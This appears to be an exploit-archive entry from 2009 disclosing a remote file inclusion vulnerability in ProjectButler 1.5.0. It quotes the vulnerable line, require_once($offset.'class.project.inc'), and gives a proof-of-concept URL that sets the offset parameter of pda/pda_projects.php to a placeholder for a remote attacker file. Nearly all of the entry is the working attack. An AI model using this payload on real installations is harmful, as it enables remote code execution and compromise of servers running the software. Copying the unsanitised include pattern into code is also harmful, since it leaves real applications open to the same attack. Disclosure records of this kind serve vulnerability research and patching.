id: 5593
date: 08/02/2009
title: ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability
author: cr4wl3r
cves: 

===============================================================
ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability
===============================================================


#projectbutler - 1.5.0 (offset) RFI Vulnerability

#Author: cr4wl3r

#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz

#Vuln : require_once($offset."class.project.inc");

#PoC :

http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]

#Greetz : MyMom [alm]



#  0day.today [2023-03-23]  #